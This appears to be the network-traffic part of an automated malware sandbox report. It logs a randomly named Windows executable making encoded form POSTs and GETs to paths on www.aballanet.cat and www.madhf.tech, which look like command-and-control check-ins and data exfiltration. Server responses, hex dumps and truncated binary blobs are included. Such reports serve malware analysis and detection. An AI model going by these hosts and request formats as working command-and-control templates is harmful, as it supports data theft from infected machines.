                                                      2192.168.2.449738134.0.14.15880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:28.040745020 CET649OUTPOST /6xrr/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.aballanet.cat
                                                      Origin: http://www.aballanet.cat
                                                      Referer: http://www.aballanet.cat/6xrr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 41 43 39 44 4a 59 64 44 48 6e 36 4f 69 6c 34 54 34 52 65 6d 7a 79 39 6f 7a 5a 7a 67 47 78 65 2b 51 3d
                                                      Data Ascii: rfJh=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDAC9DJYdDHn6Oil4T4Remzy9ozZzgGxe+Q=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449739134.0.14.15880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:30.698199034 CET10731OUTPOST /6xrr/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.aballanet.cat
                                                      Origin: http://www.aballanet.cat
                                                      Referer: http://www.aballanet.cat/6xrr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 56 48 75 74 47 2f 4e 4a 51 50 48 46 7a 49 4b 72 68 78 35 53 53 33 45 79 75 79 43 35 6a 6b 2b 4d 58 2f 71 32 5a 65 43 6e 52 4f 6d 61 2b 70 67 33 69 45 38 68 53 55 77 75 35 70 79 34 52 39 66 62 4d 65 31 4b 55 69 46 6a 48 6b 46 42 2f 54 79 30 57 63 50 41 45 30 71 69 35 57 75 34 41 45 48 30 4d 33 32 31 70 36 63 68 4d 34 5a 77 75 4e 50 75 38 4b 35 30 7a 31 77 34 53 52 79 52 42 47 41 6f 30 47 76 77 6c 72 30 78 68 32 74 58 78 6a 4d 45 67 37 2f 50 4a 73 68 55 66 44 72 6a 38 4c 4b 74 72 35 74 35 [TRUNCATED]
                                                      Data Ascii: rfJh=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO2x5aL7ccmHbGmSbCknvKWIf96+6UW4wAZctHLVFcsGeWb6r8RoXjJZg94Ht3KKd/2x79fQ/Vpp9BjlCWvq/jY/s6vwmKZR/6TURjE3ZJk6LPkRnzt/CmYlE4RumQHerDVHutG/NJQPHFzIKrhx5SS3EyuyC5jk+MX/q2ZeCnROma+pg3iE8hSUwu5py4R9fbMe1KUiFjHkFB/Ty0WcPAE0qi5Wu4AEH0M321p6chM4ZwuNPu8K50z1w4SRyRBGAo0Gvwlr0xh2tXxjMEg7/PJshUfDrj8LKtr5t587XUse0guff/h6QDc2uWiIxKzFAgmcrnomZIJrp2Nbw8iCdPDQIVVgpyJ+zvrVuY011M7NbokRHs4DQL1kdoH8Hh5jlcvFOjvjBTopG3RK6sChOHzSN+qfBhIoR7tll9YMvcF+JgwLTWqpkHHB/pkpiJdx7s1NSuSkIWw+Khy4zBQ4s8lIRphfrLUFb1I8homfDvYLG5DdHgBsz2OoKqEIygqlvZqlbmF5DYlKN27zsQjQhLCUlv2+NY83VpB4lRgtzY0dzCaJqi3loka1m6nnrM+Z+ACS2sYedqhdyROq2PaHViIjEjsOSDqpRPbbYJjN66P7BBGx/VyqoWsCp4VQj5i7bq2XUNTKI+RVtamTDHsxHl6CQ8+lDskk+92D7T/ELNw1VB5hUSWSRwFOf/06hZshRopwJ6j4wHEUpxBDrytgYsid8IXuQa5z2EMznUkm5G13saiaC3tnVhvzFRIiq6H0JPrEnTX6gvE5faLAJu7thRf9xZaBa5lFFJ68KFIk3U/k2U1BDnszTcaWbNDZzbnskD+ndPfFe8h9kjOLFLjKLyG9xXxE3SOdL/XsbpkbNI5AcQkVWuoZp6eCW5KKbKZfUoL343icK4xBj22tbNiLptW24BaCcUAPHlBPFqxYDQDWJJiBBbM6zzMDm0cdn/B1QSnmmejR [TRUNCATED]
                                                      Dec 3, 2024 06:54:32.313112020 CET1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:54:31 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                      Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                      Dec 3, 2024 06:54:32.313134909 CET1236INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                      Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                      Dec 3, 2024 06:54:32.313147068 CET1236INData Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                      Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                      Dec 3, 2024 06:54:32.313381910 CET1236INData Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e
                                                      Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
                                                      Dec 3, 2024 06:54:32.313394070 CET724INData Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
                                                      Dec 3, 2024 06:54:32.313405991 CET1236INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                      Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                      Dec 3, 2024 06:54:32.313420057 CET1236INData Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                      Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
                                                      Dec 3, 2024 06:54:32.313431025 CET448INData Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77
                                                      Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
                                                      Dec 3, 2024 06:54:32.313711882 CET1236INData Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30
                                                      Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
                                                      Dec 3, 2024 06:54:32.313724041 CET1236INData Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61
                                                      Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.449742134.0.14.15880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:33.348176003 CET364OUTGET /6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.aballanet.cat
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:54:34.898689985 CET492INHTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 03 Dec 2024 05:54:34 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      X-Redirect-By: WordPress
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Location: http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO
                                                      Content-Length: 0
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.449758103.224.182.24280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:41.184705019 CET620OUTPOST /0mwe/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.madhf.tech
                                                      Origin: http://www.madhf.tech
                                                      Referer: http://www.madhf.tech/0mwe/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 58 35 6c 70 73 68 6e 5a 6e 47 62 32 6e 58 2f 61 69 76 36 57 41 39 68 58 7a 32 2f 52 49 69 4f 6b 67 3d 3d
                                                      Data Ascii: rfJh=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2UX5lpshnZnGb2nX/aiv6WA9hXz2/RIiOkg==
                                                      Dec 3, 2024 06:54:42.445481062 CET871INHTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:42 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205282.4810970; expires=Fri, 01-Dec-2034 05:54:42 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-encoding: gzip
                                                      content-length: 576
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                      Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.449764103.224.182.24280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:43.840186119 CET640OUTPOST /0mwe/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.madhf.tech
                                                      Origin: http://www.madhf.tech
                                                      Referer: http://www.madhf.tech/0mwe/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 5a 53 4b 30 2f 4c 63 4c 66 48 2f 69 34 6e 78 39 50 33 63 64 50 4b 31 66 2b 43 73 6f 2b 48 42 6a 63 3d
                                                      Data Ascii: rfJh=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEAZSK0/LcLfH/i4nx9P3cdPK1f+Cso+HBjc=
                                                      Dec 3, 2024 06:54:45.113013983 CET871INHTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:44 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205284.6289982; expires=Fri, 01-Dec-2034 05:54:44 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-encoding: gzip
                                                      content-length: 576
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                      Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.449770103.224.182.24280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:46.497889996 CET10722OUTPOST /0mwe/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.madhf.tech
                                                      Origin: http://www.madhf.tech
                                                      Referer: http://www.madhf.tech/0mwe/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 2b 6d 31 33 2f 35 61 43 65 48 65 44 35 71 61 45 4f 76 54 63 33 45 79 6a 6b 72 31 66 72 32 46 38 66 47 79 38 65 49 2f 5a 6a 41 66 55 77 2b 78 76 67 33 59 42 75 4e 62 77 59 4a 30 39 75 44 4f 51 5a 75 59 51 36 59 6b 63 74 33 61 43 56 55 34 4e 54 64 59 59 4d 65 38 6a 58 45 59 4a 48 39 73 4e 36 36 47 73 4d 5a 65 39 2b 45 51 62 69 77 4c 67 45 49 31 51 49 6d 57 65 63 73 70 52 45 71 72 6c 51 36 52 68 71 57 75 4a 63 77 49 4f 6c 4f 57 32 6e 6d 76 53 54 44 4b 4e 6e 30 51 4b 5a 4a 41 41 36 65 46 [TRUNCATED]
